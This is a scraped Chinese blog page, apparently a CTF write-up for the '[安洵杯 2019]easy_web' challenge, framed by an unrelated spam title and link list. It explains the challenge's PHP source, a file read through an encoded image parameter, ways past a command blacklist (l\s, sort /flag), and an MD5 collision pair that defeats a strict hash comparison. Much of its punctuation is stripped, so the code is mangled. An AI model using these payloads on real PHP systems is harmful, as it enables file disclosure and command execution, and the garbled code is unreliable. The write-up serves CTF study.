当前位置: 首页 > news >正文

张家港质监站网址网站域名要钱吗

张家港质监站网址,网站域名要钱吗,电子商务网站建设规划的论文,杭州亚太建设监理咨询有限公司中标网站[安洵杯 2019]easy_web 文章目录 [安洵杯 2019]easy_web掌握知识解题思路代码分析正式解题 关键paylaod 掌握知识 url地址和源代码的信息捕捉#xff1b;图片和base64之间转换#xff1b;base64和十六进制编码的了解#xff1b;代码审计#xff0c;绕过正则匹配对关键字的…[安洵杯 2019]easy_web 文章目录 [安洵杯 2019]easy_web掌握知识解题思路代码分析正式解题 关键paylaod 掌握知识 url地址和源代码的信息捕捉图片和base64之间转换base64和十六进制编码的了解代码审计绕过正则匹配对关键字的过滤MD5碰撞md5参数强转类型的强等于绕过 解题思路 打开题目地址发现网页信息狠狠地真实了WEB手。网页没看出什么内容先查看源代码发现了一个图片的html标签里面是对其图片信息进行base64的结果 没发现特别的信息看了一眼url地址发现直接给出了了两个参数查看参数名能感觉到第一个是图片名第二个应该是要执行的命令。但是第一个参数很明显是进行编码的看其很像是base64经过两次base64和一次十六进制解码得到了文件名为555.png。 联想一下刚才图片标签中的base64信息猜测修改文件名就可以进行文件读取的操作。尝试读取index.php文件先进性16进制编码在进行两次base64进行传参将标签内的base64编码进行解码得到了index.php的源代码 index.php 696e6465782e706870 Njk2ZTY0NjU3ODJlNzA2ODcw TmprMlpUWTBOalUzT0RKbE56QTJPRGN3得到了源代码就要开始代码审计了先进性一下简单分析发现关键点在cmd参数img参数传参再利用完文件读取就没有什么用处了。cmd的参数是系统命令其中需要绕过挺多的正则的但都是关键字匹配可以使用参杂符号来进行绕过关键的几个符号没有背过滤就好。在执行命令前还需要通过md5的强比较这里进行了类型的强转所以使用数组就不可以了但是相关的paylaod网上还是随便搜索的 ?php error_reporting(E_ALL || ~ E_NOTICE); header(content-type:text/html;charsetutf-8); $cmd $_GET[cmd]; if (!isset($_GET[img]) || !isset($_GET[cmd])) header(Refresh:0;url./index.php?imgTXpVek5UTTFNbVUzTURabE5qYz0cmd); $file hex2bin(base64_decode(base64_decode($_GET[img])));$file preg_replace(/[^a-zA-Z0-9.]/, , $file); if (preg_match(/flag/i, $file)) {echo img src ./ctf3.jpeg;die(xixi嚚?no flag); } else {$txt base64_encode(file_get_contents($file));echo img srcdata:image/gif;base64, . $txt . /img;echo br; } echo $cmd; echo br; if (preg_match(/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\|\|\|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\[^\d]||\||\\$|\[|\]|{|}|\(|\)|-||/i, $cmd)) {echo(forbid ~);echo br; } else {if ((string)$_POST[a] ! (string)$_POST[b] md5($_POST[a]) md5($_POST[b])) {echo $cmd;} else {echo (md5 is funny ~);} }? html stylebody{background:url(./bj.png) no-repeat center center;background-size:cover;background-attachment:fixed;background-color:#CCCCCC; } /style body /body /html代码分析 对于改题目的正则匹配ls被过滤了但是依旧可以使用参杂符号的形式来绕过例如ls l\s进行绕过这里在shell解析器中都会被当作ls执行但这里单引号被过滤了就使用后者进行绕过读取文件的命令有很多这里可以使用掺杂符号进行绕过还可以使用其他的命令进行查看文件内容。没有过滤空格和/还是不错的 if (preg_match(/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\|\|\|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\[^\d]||\||\\$|\[|\]|{|}|\(|\)|-||/i, $cmd)) {echo(forbid ~);echo br; }很明显这是md5函数绕过的判断不同以往的md5强比较的题目这里对传入的值进行了了强转字符型的操作这样就不能使用数组进行绕过了需要去进行md5碰撞得到两个字符串不相同但是md5的结果相同的。当然这在网上已经烂大街了搜索一下md5碰撞绕过也就能找到相应的paylaod。通过这波判断也就能执行传入的命令了 if ((string)$_POST[a] ! (string)$_POST[b] md5($_POST[a]) md5($_POST[b])) {echo $cmd;} else {echo (md5 is funny ~);}正式解题 绕过的条件已经分析好了直接使用分析得到了的paylaod进行抓包传参发现目录下并没有flag前去查看根目录发现flag文件。毕竟是GET传参还是bp抓包所以空格还是替换成%20才能够被解析 这里就不使用参杂符号绕过了使用sort进行读取文件得到flag 关键paylaod index.php 696e6465782e706870 Njk2ZTY0NjU3ODJlNzA2ODcw TmprMlpUWTBOalUzT0RKbE56QTJPRGN3cmdl\s cmdl\s%20/ cmdsort%20/flaga%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2b%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
http://www.hkea.cn/news/14273815/

相关文章:

  • 设计网站软件开发大连比较好的网站公司吗
  • 建设一个视频网站首页西安建站模板厂家
  • 松江建设投资有限公司网站学校后勤网站建设方案
  • 如何进行网站的seo百度产品推广
  • 华艺网站建设图书馆网站建设规划
  • 网站防采集 如何采集导航网站备案
  • 哈尔滨建设银行网站制作微信小程序费用
  • 平顶山建站公司微网站开发服务
  • 做金融量化的网站个人网站做什么类型好
  • 多平台网站建设phpstudy建wordpress
  • 淘宝网站的建设与运营设计思路居然之家装修公司官网
  • 网站建设学习要多久中国十大公司企业文化
  • 南华网站建设搜房网网站跳出率
  • 做网站公司的收费多少网站设计网站项目流程图
  • php开发网站项目心得网站搜索引擎优化的内容
  • 网站建设的人员组织插头 东莞网站建设
  • 低价网站建设公司东莞百度seo关键词优化
  • php语言 网站建设做分类信息网站赚钱吗
  • 微网站站点名称爱南宁app下载官网最新
  • 哪个网站开发软件wordpress手机排版
  • 可以玩游戏的网站手机首页设计
  • 免费的模板网站wordpress文章放视频
  • 网站站内的seo怎么做百度知道在线问答
  • 大型网站制作哪家好关于加强网站建设
  • 沧州网站建没网页设计与制作教程题
  • 自已做个网站怎么做网站推广公司 wordpress
  • 盘锦网站建设服务wap网站制作需要多少钱
  • 手机号码网站开发西安seo网站排名
  • 大英哪里有做网站的黄页引流推广链接
  • 赣州网站建设平台网站基础代码html